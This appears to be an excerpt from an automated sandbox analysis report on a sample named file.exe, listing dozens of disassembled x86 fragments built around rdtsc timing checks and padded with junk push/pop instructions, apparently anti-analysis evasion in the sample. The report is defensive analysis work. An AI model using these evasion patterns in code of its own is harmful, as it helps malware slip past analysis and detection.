            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A683D5 second address: A683FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FAD40FD676Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A683FA second address: A68412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD40FC0C5Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68412 second address: A68432 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FAD40FD6773h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68432 second address: A68457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FC0C68h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68502 second address: 89EEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FAD40FD676Ch 0x0000000c jns 00007FAD40FD6766h 0x00000012 popad 0x00000013 add dword ptr [esp], 64A0D2C0h 0x0000001a jnc 00007FAD40FD6777h 0x00000020 push dword ptr [ebp+122D1461h] 0x00000026 jmp 00007FAD40FD6772h 0x0000002b call dword ptr [ebp+122D3A2Ch] 0x00000031 pushad 0x00000032 clc 0x00000033 xor eax, eax 0x00000035 jmp 00007FAD40FD676Dh 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cmc 0x0000003f mov dword ptr [ebp+122D3B1Eh], eax 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+122D3DCAh] 0x0000004c jmp 00007FAD40FD6771h 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1E60h], edi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jmp 00007FAD40FD6772h 0x00000066 lodsw 0x00000068 jmp 00007FAD40FD676Bh 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 cld 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov dh, ch 0x00000079 add esi, dword ptr [ebp+122D3D46h] 0x0000007f popad 0x00000080 nop 0x00000081 push eax 0x00000082 jbe 00007FAD40FD6777h 0x00000088 jmp 00007FAD40FD6771h 0x0000008d pop eax 0x0000008e push eax 0x0000008f push ebx 0x00000090 pushad 0x00000091 pushad 0x00000092 popad 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0511B second address: A0515D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAD40FC0C56h 0x0000000a jmp 00007FAD40FC0C62h 0x0000000f popad 0x00000010 jmp 00007FAD40FC0C5Fh 0x00000015 jbe 00007FAD40FC0C5Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d jne 00007FAD40FC0C56h 0x00000023 push eax 0x00000024 push edx 0x00000025 jnl 00007FAD40FC0C56h 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0515D second address: A05161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FBB6 second address: A6FBBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70018 second address: A7001F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7001F second address: A70025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70025 second address: A70032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70032 second address: A70057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FC0C62h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jns 00007FAD40FC0C58h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70057 second address: A7005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70478 second address: A70487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD40FC0C56h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70487 second address: A70491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD40FD6766h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70491 second address: A70497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70497 second address: A7049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A086B0 second address: A086D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 jne 00007FAD40FC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A086D2 second address: A086DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD40FD6766h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A755E2 second address: A755E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75B90 second address: A75BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD6774h 0x00000009 push eax 0x0000000a jp 00007FAD40FD6766h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop eax 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C33D second address: A7C359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C359 second address: A7C361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B76E second address: A4B773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B773 second address: A4B778 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C0C7 second address: A4C0DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jne 00007FAD40FC0C56h 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C0DC second address: A4C0FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAD40FD676Ch 0x00000008 jnp 00007FAD40FD6766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 pushad 0x00000016 jno 00007FAD40FD6766h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C0FA second address: A4C13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007FAD40FC0C6Dh 0x0000000e jmp 00007FAD40FC0C67h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAD40FC0C66h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C13B second address: A4C140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1B1 second address: A4C1CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C69h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27F64 second address: A27F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27F6E second address: A27F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27F78 second address: A27F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27F82 second address: A27F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A27F86 second address: A27F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CBFD second address: A7CC02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D064 second address: A7D068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D068 second address: A7D06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D06E second address: A7D08D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6775h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FAD40FD6766h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D08D second address: A7D093 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81876 second address: A8187B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81DDA second address: A81DE4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAD40FC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A821F6 second address: A821FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A821FA second address: A82204 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD40FC0C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82204 second address: A8220B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A824FB second address: A82510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAD40FC0C5Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82510 second address: A82514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82673 second address: A826AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAD40FC0C56h 0x0000000a jmp 00007FAD40FC0C65h 0x0000000f popad 0x00000010 jmp 00007FAD40FC0C64h 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A826AD second address: A826D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FAD40FD676Ah 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAD40FD6777h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8140D second address: A81412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00053 second address: A00057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00057 second address: A0006F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAD40FC0C5Eh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0006F second address: A0007D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0007D second address: A00081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00081 second address: A000A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FAD40FD6766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD40FD6777h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A310 second address: A8A316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A316 second address: A8A31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A31A second address: A8A32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FAD40FC0C56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A32A second address: A8A32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D468 second address: A8D47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD40FC0C56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FC0C5Ah 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CD40 second address: A8CD52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007FAD40FD676Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D044 second address: A8D070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FAD40FC0C62h 0x00000012 popad 0x00000013 pushad 0x00000014 jc 00007FAD40FC0C58h 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D070 second address: A8D074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92029 second address: A92045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92045 second address: A9204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9204B second address: A92057 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92188 second address: A92192 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92345 second address: A92366 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD40FC0C67h 0x00000008 jmp 00007FAD40FC0C61h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FAD40FC0C56h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A933C0 second address: A933D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAD40FD6770h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97352 second address: A9735D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FAD40FC0C56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9735D second address: A973AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD676Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FAD40FD6777h 0x00000010 jng 00007FAD40FD6766h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jnl 00007FAD40FD6766h 0x00000022 push edx 0x00000023 pop edx 0x00000024 pushad 0x00000025 popad 0x00000026 push edi 0x00000027 pop edi 0x00000028 popad 0x00000029 jnl 00007FAD40FD676Eh 0x0000002f push edx 0x00000030 pop edx 0x00000031 js 00007FAD40FD6766h 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A973AF second address: A973B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97533 second address: A97550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A976C1 second address: A976CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A455 second address: A9A45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAD40FD6766h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A45F second address: A9A463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A463 second address: A9A469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A469 second address: A9A480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FAD40FC0C66h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 js 00007FAD40FC0C56h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A605 second address: A9A60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FDBC second address: A9FDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0021 second address: AA0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA06CD second address: AA06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0D1B second address: AA0D23 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0D23 second address: AA0D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA137C second address: AA1380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1380 second address: AA1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1388 second address: AA138E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA138E second address: AA13AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1675 second address: AA1679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1679 second address: AA16A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAD40FC0C64h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD40FC0C5Dh 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA16A8 second address: AA16CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA16CD second address: AA16D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA356E second address: AA358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD6772h 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA358D second address: AA3591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
